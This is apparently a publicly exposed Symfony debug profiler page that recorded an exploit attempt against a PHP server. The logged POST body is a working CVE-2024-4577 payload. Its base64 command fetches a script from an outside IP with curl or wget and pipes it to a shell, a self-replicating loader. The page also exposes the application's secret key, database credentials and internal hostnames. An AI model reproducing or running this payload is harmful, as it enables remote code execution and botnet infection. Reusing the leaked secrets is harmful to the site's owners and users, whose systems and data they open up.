http://75.119.139.122:443/hello.world?%ADd_allow_url_include%3D1_%ADd_auto_prepend_file%3Dphp%3A%2F%2Finput=

Method
POST
HTTP Status
404
IP
178.128.38.217
Profiled on
Token
e652c4

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input 
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA 
"=")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

No attributes

Request Headers

Header Value
accept 
"*/*"
connection 
"keep-alive"
content-length 
"225"
content-type 
"application/x-www-form-urlencoded"
host 
"75.119.139.122:443"
upgrade-insecure-requests 
"1"
user-agent 
"Custom-AsyncHttpClient"
x-php-ob-level 
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-length 
1797
content-type 
"application/json"
date 
"Mon, 30 Sep 2024 08:16:07 GMT"
x-debug-token 
"e652c4"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
(no data)

Defined as regular env variables

Key Value
APCU_VERSION 
"5.1.18"
APP_DEBUG 
"1"
APP_ENV 
"dev"
APP_SECRET 
"a9509e2b8fdf0bf9c36426bf6c36440"
BACK_BASE_URL 
"https://api.chizellefreres.com"
CONTENT_LENGTH 
"225"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
DATABASE_HOST 
"database"
DATABASE_NAME 
"chizelle"
DATABASE_PASSWORD 
"chizelle007"
DATABASE_PORT 
"3306"
DATABASE_USER 
"chizelle"
DOCUMENT_ROOT 
"/home/user/app"
DOCUMENT_URI 
"/api/public/index.php"
FCGI_ROLE 
"RESPONDER"
FRONT_BASE_URL 
"https://front.chizellefreres.com"
GATEWAY_INTERFACE 
"CGI/1.1"
GPG_KEYS 
"42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312"
HOME 
"/home/dev"
HOSTNAME 
"f9e807812aeb"
HTTPS 
"off"
HTTP_ACCEPT 
"*/*"
HTTP_CONNECTION 
"keep-alive"
HTTP_CONTENT_LENGTH 
"225"
HTTP_CONTENT_TYPE 
"application/x-www-form-urlencoded"
HTTP_HOST 
"75.119.139.122:443"
HTTP_UPGRADE_INSECURE_REQUESTS 
"1"
HTTP_USER_AGENT 
"Custom-AsyncHttpClient"
MAILER_URL 
"smtp://mailhog:1025"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHPIZE_DEPS 
"autoconf \t\tdpkg-dev \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkg-config \t\tre2c"
PHP_ASC_URL 
"https://www.php.net/distributions/php-7.4.27.tar.xz.asc"
PHP_CFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_CPPFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_INI_DIR 
"/usr/local/etc/php"
PHP_LDFLAGS 
"-Wl,-O1 -pie"
PHP_SELF 
"/api/public/index.php"
PHP_SHA256 
"3f8b937310f155822752229c2c2feb8cc2621e25a728e7b94d0d74c128c43d0c"
PHP_URL 
"https://www.php.net/distributions/php-7.4.27.tar.xz"
PHP_VERSION 
"7.4.27"
PWD 
"/home/user/app/api"
QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"178.128.38.217"
REMOTE_PORT 
"35090"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1727684167
REQUEST_TIME_FLOAT 
1727684167.7009
REQUEST_URI 
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME 
"/home/user/app/api/public/index.php"
SCRIPT_NAME 
"/api/public/index.php"
SERVER_ADDR 
"172.18.0.7"
SERVER_NAME 
"api.chizellefreres.com"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.20.2"
USER 
"dev"
USER_GID 
"1000"
USER_ID 
"1000"
XDEBUG_VERSION 
"2.8.0"